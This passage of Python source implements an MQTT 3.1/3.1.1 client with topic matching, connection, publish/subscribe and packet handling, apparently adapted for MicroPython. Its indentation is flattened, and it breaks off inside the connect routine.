if spos == slen-3 and sub[spos+1] == '/' and sub[spos+2] == '#':
result = True
multilevel_wildcard = True
break
spos += 1
tpos += 1
if tpos == tlen and spos == slen-1 and sub[spos] == '+':
spos += 1
result = True
break
else:
if sub[spos] == '+':
spos += 1
while tpos < tlen and topic[tpos] != '/':
tpos += 1
if tpos == tlen and spos == slen:
result = True
break
elif sub[spos] == '#':
multilevel_wildcard = True
if spos+1 != slen:
result = False
break
else:
result = True
break
else:
result = False
break
if not multilevel_wildcard and (tpos < tlen or spos < slen):
result = False
return result
class MQTTMessage(object):
""" This is a class that describes an incoming message. It is passed to the
on_message callback as the message parameter.
"""
def __init__(self, mid=0, topic=b""):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = mid
self._topic = topic
self.payload = b""
self.qos = 0
self.retain = False
def __eq__(self, other):
"""Override the default Equals behavior"""
if isinstance(other, self.__class__):
return self.mid == other.mid
return False
def __ne__(self, other):
"""Define a non-equality test"""
return not self.__eq__(other)
@property
def topic(self):
return self._topic # Returns bytes # .decode('utf-8') = str
@topic.setter
def topic(self, value):
self._topic = value
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
"""
def __init__(self, client_id="", clean_session=True, userdata=None, protocol=MQTTv31):
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
self._clean_session = clean_session
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
# [MQTT-3.1.3-4] Client Id must be UTF-8 encoded string.
if client_id == "" or client_id is None:
if protocol == MQTTv31:
pass # self._client_id = base62(uuid.uuid4().int, padding=22)
else:
self._client_id = b""
else:
self._client_id = client_id
if isinstance(self._client_id, str):
self._client_id = self._client_id.encode('utf-8')
self._username = ""
self._password = ""
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = []
self._current_out_packet = None
self._last_msg_in = time_func()
self._last_msg_out = time_func()
self._reconnect_min_delay = 1
self._reconnect_max_delay = 120
self._reconnect_delay = None
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._out_messages = []
self._in_messages = []
self._max_inflight_messages = 20
self._inflight_messages = 0
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
self._on_message_filtered = []
self._host = ""
self._port = 1883
self._bind_address = ""
self._in_callback_mutex = threading.Lock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.Lock() # RLock
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.Lock() # RLock
self._in_message_mutex = threading.Lock()
# Other mutexes:
# self._callback_mutex = threading.RLock() # Changing callback func and checking func exists - not necessary
# self._reconnect_delay_mutex = threading.Lock() # Changing and using reconnect delay - not necessary
# self._mid_generate_mutex = threading.Lock() # Creating next mid - good, but necessary?
self._thread = None
self._thread_terminate = False
self._ssl = False
# No default callbacks
self.on_log = None
self.on_connect = None
self.on_subscribe = None
self.on_message = None
self.on_publish = None
self.on_unsubscribe = None
self.on_disconnect = None
self._strict_protocol = False
def __del__(self):
pass
def _sock_recv(self, bufsize):
# sleep_ms(20)
try:
return self._sock.recv(bufsize)
except socket.error as err:
self._easy_log(MQTT_LOG_DEBUG, "_sock_recv err: " + str(err))
if DEBUG_PC:
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_READ:
raise WouldBlockError()
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_WRITE:
# self._call_socket_register_write()
raise WouldBlockError()
if err.errno == EAGAIN:
raise WouldBlockError()
raise
def _sock_send(self, buf):
try:
return self._sock.send(buf)
except socket.error as err:
self._easy_log(MQTT_LOG_DEBUG, "_sock_send err: " + str(err))
if DEBUG_PC:
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_READ:
raise WouldBlockError()
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_WRITE:
# self._call_socket_register_write()
raise WouldBlockError()
if err.errno == EAGAIN:
# self._call_socket_register_write()
raise WouldBlockError()
raise
def _sock_close(self):
"""Close the connection to the server."""
if not self._sock:
return
try:
sock = self._sock
self._sock = None
# self._call_socket_unregister_write(sock)
# self._call_socket_close(sock)
finally:
# In case a callback fails, still close the socket to avoid leaking the file descriptor.
sock.close()
def reinitialise(self, client_id="", clean_session=True, userdata=None):
if self._sock:
self._sock.close()
self._sock = None
self.__init__(client_id, clean_session, userdata)
def tls_set(self, ca_certs=None, certfile=None, keyfile=None, cert_reqs=None, tls_version=None, ciphers=None):
if ssl is None:
raise ValueError('This platform has no SSL/TLS.')
# TODO: Add ca_certs support if required, used in ssl.wrap_socket()
self._ssl = True
def tls_unset(self):
if ssl is None:
raise ValueError('This platform has no SSL/TLS.')
self._ssl = False
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
"""
# print("connect")
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide very quick
start.
"""
# print("connect_async")
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state = mqtt_cs_connect_async
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
# print("reconnect")
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
with self._out_packet_mutex:
self._out_packet = []
with self._current_out_packet_mutex:
self._current_out_packet = None
with self._msgtime_mutex:
self._last_msg_in = time_func()
self._last_msg_out = time_func()
self._ping_t = 0
self._state = mqtt_cs_new
if self._sock:
self._sock.close()
self._sock = None
# print("self._sock = None")
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
self._easy_log(MQTT_LOG_DEBUG, ">> sock.create_connection")
sock = self._create_socket_connection()
if self._ssl:
# TODO: Add ca_certs support if required
print(">> wrapping socket")
try:
sock = ssl.wrap_socket(sock, server_hostname=self._host) # , do_handshake_on_connect=False
except ssl.SSLError as e:
print(e)
except ValueError as e:
print(e)
sock = ssl.wrap_socket(sock)
# sock = ssl.wrap_socket(sock, do_handshake_on_connect=False)
except TypeError as e:
# Difference in Micropython (socket has internal SSLContext for "server_hostname") and Python (SSLContext)
print(e)
sock = ssl.wrap_socket(sock)
# sock = ssl.wrap_socket(sock)
sock.settimeout(self._keepalive)
print(">> socket handshake")
sock.do_handshake()
self._sock = sock
self._sock.setblocking(False)
if not DEBUG_PC:
self._poll = select.poll()
# self.fileno = self._sock.fileno()
self._poll.register(self._sock, select.POLLIN | select.POLLOUT | select.POLLERR | select.POLLHUP) #self.fileno)
return self._send_connect(self._keepalive)
def loop_forever(self, timeout=1000, max_packets=1, retry_first_connection=False):
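# Blocking network loop: repeatedly calls loop() and, on connection loss,
# waits and reconnects until disconnect() is called or the thread is told to terminate.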
run = True
while run:
if self._thread_terminate is True:
break
# if self._state == mqtt_cs_connect_async:
if not (self._state == mqtt_cs_new or self._state == mqtt_cs_connected):
try:
print(">> loop forever - reconnect top")
self.reconnect()
except (socket.error, OSError):
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._reconnect_wait()
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
def should_exit():
return self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True
if should_exit():
run = False
else:
self._reconnect_wait()
if should_exit():
run = False
else:
try:
print(">> loop forever - reconnect bottom")
self.reconnect()
except (socket.error, OSError):
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
print("<< Breaking loop forever")
return rc
def loop_start(self):
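# Spawn a background thread that runs self._thread_main; returns
# MQTT_ERR_INVAL if a loop thread has already been started.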
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
threading.stack_size(12288 if not DEBUG_PC else 32768) # Increase stack size to allow for more stack frames (deeper nested functions)
self._thread.start()
def loop_stop(self):
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
# if threading.current_thread() != self._thread:
# self._thread.join()
# self._thread = None
def loop(self, timeout=1000, max_packets=1):
"""Process network events.
"""
# print("loop")
if timeout < 0:
raise ValueError('Invalid timeout.')
with self._current_out_packet_mutex:
# print("self._current_out_packet =", self._current_out_packet)
with self._out_packet_mutex:
# print("self._out_packet =", self._out_packet)
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
# print("self._current_out_packet =", self._current_out_packet)
if self._current_out_packet:
if DEBUG_PC:
wlist = [self._sock]
elif self._sock:
self._poll.modify(self._sock, select.POLLIN | select.POLLOUT | select.POLLERR | select.POLLHUP)
else:
if DEBUG_PC:
wlist = []
elif self._sock:
self._poll.modify(self._sock, select.POLLIN | select.POLLERR | select.POLLHUP)
if DEBUG_PC:
rlist = [self._sock]
xlist = [self._sock]
try:
socklist = select.select(rlist, wlist, xlist, (timeout / 1000)) # timeout in seconds not ms
except TypeError:
# Socket isn't the correct type; in all likelihood the connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for some reason.
return MQTT_ERR_CONN_LOST
except Exception:
# Note that KeyboardInterrupt, etc. can still terminate since they are not derived from Exception
return MQTT_ERR_UNKNOWN
if self._sock in socklist[2]:
print("select/socket xlist error found!")
if self._sock in socklist[0]:
rc = self.loop_read(max_packets)
if rc or (self._sock is None):
return rc
if self._sock in socklist[1]:
rc = self.loop_write(max_packets)
if rc or (self._sock is None):
return rc
else:
events = self._poll.poll(timeout)
# print("events =", events)
for poll_obj, ev in events:
# print("event =", "pHUP" if ev & select.POLLHUP else "", "pERR" if ev & select.POLLERR else "", "pIN" if ev & select.POLLIN else "", "pOUT" if ev & select.POLLOUT else "")
if ev & select.POLLHUP or ev & select.POLLERR:
self._easy_log("poll/socket event error found! " + str(ev))
if ev & select.POLLIN:
rc = self.loop_read(max_packets)
if rc or (self._sock is None):
return rc
if ev & select.POLLOUT:
rc = self.loop_write(max_packets)
if rc or (self._sock is None):
return rc
return self.loop_misc()
def _publish_is_free(self):
# if self._current_out_packet_mutex.acquire(False) and self._out_packet_mutex.acquire(False):
return (self._current_out_packet is None and len(self._out_packet) == 0 and len(self._out_messages) == 0)
# return True
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS to
indicate success or MQTT_ERR_NO_CONN if the client is not currently
connected. mid is the message ID for the publish request. The mid
value can be used to track the publish request by checking against the
mid argument in the on_publish() callback if it is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
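# Usage sketch (topic and payload are illustrative values only):
#   rc, mid = client.publish("sensors/temp", "21.5", qos=1)
#   # match 'mid' against the mid reported to on_publish() to confirm delivery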
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic = topic.encode('utf-8')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
if qos < 0 or qos > 2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str):
local_payload = payload.encode('utf-8')
elif isinstance(payload, (bytes, bytearray)):
local_payload = payload
elif isinstance(payload, (int, float)):
local_payload = str(payload).encode('ascii')
elif payload is None:
local_payload = b''
else:
raise TypeError('payload must be a string, bytes, bytearray, int, float or None.')
if len(local_payload) > 268435455:
raise ValueError('Payload too large.')
local_mid = self._mid_generate()
if qos == 0:
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False)
return (rc, local_mid)
else:
message = MQTTMessage(local_mid, topic)
message.timestamp = time_func()
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
with self._out_message_mutex: # .acquire()
self._out_messages.append(message)
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages += 1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
# .release()
rc = self._send_publish(message.mid, topic, message.payload, message.qos, message.retain, message.dup)
# remove from inflight messages so it will be sent after a connection is made
if rc is MQTT_ERR_NO_CONN:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
return (rc, local_mid)
else:
message.state = mqtt_ms_queued
# .release()
return (MQTT_ERR_SUCCESS, local_mid)
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. Need have no relationship to the client id. Must be unicode [MQTT-3.1.3-11].
Set to None to reset client back to not using username/password for broker authentication.
password: The password to authenticate with. Optional, set to None if not required. If it is unicode, then it
will be encoded as UTF-8.
"""
# [MQTT-3.1.3-11] User name must be UTF-8 encoded string
self._username = None if username is None else username.encode('utf-8')
self._password = password
if isinstance(self._password, str):
self._password = self._password.encode('utf-8')
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state = mqtt_cs_disconnecting
if self._sock is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics."""
# print("subscribe")
topic_qos_list = None
if isinstance(topic, str):
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, tuple):
if topic[1]<0 or topic[1]>2:
raise ValueError('Invalid QoS level.')
if topic[0] is None or len(topic[0]) == 0 or not isinstance(topic[0], str):
raise ValueError('Invalid topic.')
topic_qos_list = [(topic[0].encode('utf-8'), topic[1])]
elif isinstance(topic, list):
topic_qos_list = []
for t in topic:
if t[1]<0 or t[1]>2:
raise ValueError('Invalid QoS level.')
if t[0] is None or len(t[0]) == 0 or not isinstance(t[0], str):
raise ValueError('Invalid topic.')
topic_qos_list.append((t[0].encode('utf-8'), t[1]))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics."""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, str):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, str):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. """
# print("loop_read")
if self._sock is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
print("max_packets =", max_packets)
max_packets = 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process write network events."""
# print("loop_write")
if self._sock is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_misc(self):
"""Process miscellaneous network events."""
# print("loop_misc")
if self._sock is None:
return MQTT_ERR_NO_CONN
now = time_func()
self._check_keepalive()
if self._last_retry_check + 1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
# rc = 1 # official library
rc = MQTT_ERR_CONN_LOST
if self.on_disconnect:
with self._in_callback_mutex:
self.user_data_set("dc in loop_misc")
self.on_disconnect(self, self._userdata, rc)
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, bytes):
self._will_payload = payload
elif isinstance(payload, str):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, bytearray):
self._will_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
self._will_payload = str(payload)
elif payload is None:
self._will_payload = None
else:
raise TypeError('payload must be a utf-8 bytes, string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
return self._sock
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
for i in range(0, len(self._on_message_filtered)):
if self._on_message_filtered[i][0] == sub:
self._on_message_filtered[i] = (sub, callback)
return
self._on_message_filtered.append((sub, callback))
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
for i in range(0, len(self._on_message_filtered)):
if self._on_message_filtered[i][0] == sub:
self._on_message_filtered.pop(i)
return
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
self._easy_log(MQTT_LOG_WARNING, "Disconnecting because of Reason Code {}".format(rc))
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
if self.on_disconnect:
with self._in_callback_mutex:
self.user_data_set("dc in _loop_rc_handle")
self.on_disconnect(self, self._userdata, rc)
return rc
def _packet_read(self):
# This gets called if pselect() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
# Then try to read the remaining length. This may fail because it may
# be more than one byte - we will need to save data pending the next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
# print("_packet_read")
if self._in_packet['command'] == 0:
try:
command = self._sock_recv(1)
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, "failed to receive on socket1: " + str(err))
return 1
else:
if len(command) == 0:
print("_packet_read 1 error: cmd len is 0")
return 1
command, = struct.unpack("!B", command)
self._in_packet['command'] = command
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
byte = self._sock_recv(1)
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, "failed to receive on socket2: " + str(err))
return 1
else:
if len(byte) == 0:
print("_packet_read 2 error: byte len is 0")
return 1
byte, = struct.unpack("!B", byte)
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] += (byte & 127) * self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
data = self._sock_recv(self._in_packet['to_process'])
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, "failed to receive on socket3: " + str(err))
return 1
else:
if len(data) == 0:
print("_packet_read 3 error: data len is 0")
return 1
self._in_packet['to_process'] -= len(data)
self._in_packet['packet'] += data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = dict(
command=0,
have_remaining=0,
remaining_count=[],
remaining_mult=1,
remaining_length=0,
packet=b"",
to_process=0,
pos=0)
with self._msgtime_mutex:
self._last_msg_in = time_func()
return rc
def _packet_write(self):
# print("_packet_write")
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
write_length = self._sock_send(packet['packet'][packet['pos']:])
except (AttributeError, ValueError):
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except WouldBlockError:
self._current_out_packet_mutex.release()
return MQTT_ERR_AGAIN
except socket.error as err:
self._current_out_packet_mutex.release()
self._easy_log(MQTT_LOG_ERR, "failed to receive on socket: " + str(err))
return 1
if write_length > 0:
packet['to_process'] -= write_length
packet['pos'] += write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
if self.on_publish:
with self._in_callback_mutex:
self.on_publish(self, self._userdata, packet['mid'])
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
with self._msgtime_mutex:
self._last_msg_out = time_func()
if self.on_disconnect:
with self._in_callback_mutex:
self.user_data_set("dc in _packet_write")
self.on_disconnect(self, self._userdata, MQTT_ERR_SUCCESS)
if self._sock:
self._sock.close()
self._sock = None
return MQTT_ERR_SUCCESS
with self._out_packet_mutex:
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
else:
self._current_out_packet = None
else:
break
self._current_out_packet_mutex.release()
with self._msgtime_mutex:
self._last_msg_out = time_func()
# print("_p_w _current_out_packet =", self._current_out_packet)
return MQTT_ERR_SUCCESS
def _easy_log(self, level, fmt, *args):
if self.on_log is not None:
buf = fmt % args
try:
self.on_log(self, self._userdata, level, buf)
except Exception:
# Can't _easy_log this, as we'll recurse until we break
pass # self._logger will pick this up, so we're fine
def _check_keepalive(self):
if self._keepalive == 0:
return MQTT_ERR_SUCCESS
now = time_func()
with self._msgtime_mutex:
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
if self._sock is not None and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
with self._msgtime_mutex:
self._last_msg_out = now
self._last_msg_in = now
else:
self._sock_close()
                print("ping expired: msg_out %ds, msg_in %ds" % ((now - last_msg_out - self._keepalive), (now - last_msg_in - self._keepalive)))
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
                    # rc = 1 # official library
rc = MQTT_ERR_CONN_LOST
if self.on_disconnect:
with self._in_callback_mutex:
self.user_data_set("dc in _check_keepalive")
self.on_disconnect(self, self._userdata, rc)
def _mid_generate(self):
self._last_mid = self._last_mid + 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
@staticmethod
def _topic_wildcard_len_check(topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if b'+' in topic or b'#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time_func()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte = byte | 0x80
remaining_bytes.append(byte)
# packet.append(byte)
packet.extend(struct.pack("!B", byte))
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
def _pack_str16(self, packet, data):
if isinstance(data, str):
data = data.encode('utf-8')
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
def _send_publish(self, mid, topic, payload=b'', qos=0, retain=False, dup=False):
# we assume that topic and payload are already properly encoded
assert not isinstance(topic, str) and not isinstance(payload, str) and payload is not None
if self._sock is None:
return MQTT_ERR_NO_CONN
# utopic = topic.encode('utf-8')
command = PUBLISH | ((dup & 0x1) << 3) | (qos << 1) | retain
packet = bytearray()
packet.append(command) # packet.extend(struct.pack("!B", command))
payloadlen = len(payload)
remaining_length = 2 + len(topic) + payloadlen
if payloadlen == 0:
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+str(topic)+"' (NULL payload)")
else:
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+str(topic)+"', ... ("+str(payloadlen)+" bytes)")
if qos > 0:
# For message id
remaining_length += 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
packet.extend(payload)
return self._packet_queue(PUBLISH, packet, mid, qos)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid): #, dup=False
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREL | 2, mid, False) #, dup)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command = command | 0x8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive):
# print("_send_connect")
if self._protocol == MQTTv31:
protocol = PROTOCOL_NAMEv31
proto_ver = 3
else:
protocol = PROTOCOL_NAMEv311
proto_ver = 4
remaining_length = 2 + len(protocol) + 1 + 1 + 2 + 2 + len(self._client_id)
connect_flags = 0
if self._clean_session:
connect_flags = connect_flags | 0x02
if self._will:
remaining_length = remaining_length + 2 + len(self._will_topic) + 2 + (0 if self._will_payload is None else len(self._will_payload))
connect_flags = connect_flags | 0x04 | ((self._will_qos & 0x03) << 3) | ((self._will_retain & 0x01) << 5)
if self._username:
remaining_length = remaining_length + 2 + len(self._username)
connect_flags = connect_flags | 0x80
if self._password:
connect_flags = connect_flags | 0x40
remaining_length = remaining_length + 2 + len(self._password)
command = CONNECT
packet = bytearray()
packet.extend(struct.pack("!B", command)) # packet.append(command)
